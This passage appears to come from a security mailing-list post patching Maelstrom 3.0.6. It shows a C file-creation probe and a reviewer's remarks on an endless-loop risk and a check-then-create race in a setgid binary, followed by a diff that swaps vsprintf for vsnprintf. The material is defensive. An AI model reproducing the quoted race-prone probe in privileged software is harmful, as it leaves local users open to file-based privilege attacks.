if ( ((fp=fopen(file, "r")) == NULL) &&
((fp=fopen(file, "w")) != NULL) ) {
found = 1;
diff -ur
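Review bot: With truncation now possible, a `prefix` long enough to fill `file` yields the same name for every value of `which`, so if that file already exists the `for ( which=0; !found; ++which )` loop can no longer make progress. The snprintf() result should be checked and the search abandoned on truncation, e.g. `if (n < 0 || (size_t)n >= sizeof(file)) break;` with `n` holding the return value. The open-for-read-then-open-for-write probe is also a check-then-create sequence, which matters for a binary the advisory shows installed setgid; an exclusive create (`open()` with `O_CREAT|O_EXCL`) would close that gap. The rest of the loop and the handling of `fp` are outside the hunk.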
Maelstrom-3.0.6-orig/screenlib/SDL_FrameBuf.h
Maelstrom-3.0.6/screenlib/SDL_FrameBuf.h
--- Maelstrom-3.0.6-orig/screenlib/SDL_FrameBuf.h 2000-09-25
02:55:39 +0900
+++ Maelstrom-3.0.6/screenlib/SDL_FrameBuf.h 2003-05-21 11:27:41 +0900
@@ -165,7 +165,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
(102197) /Andrew Church <achurch@achurch.org>/(Ombruten)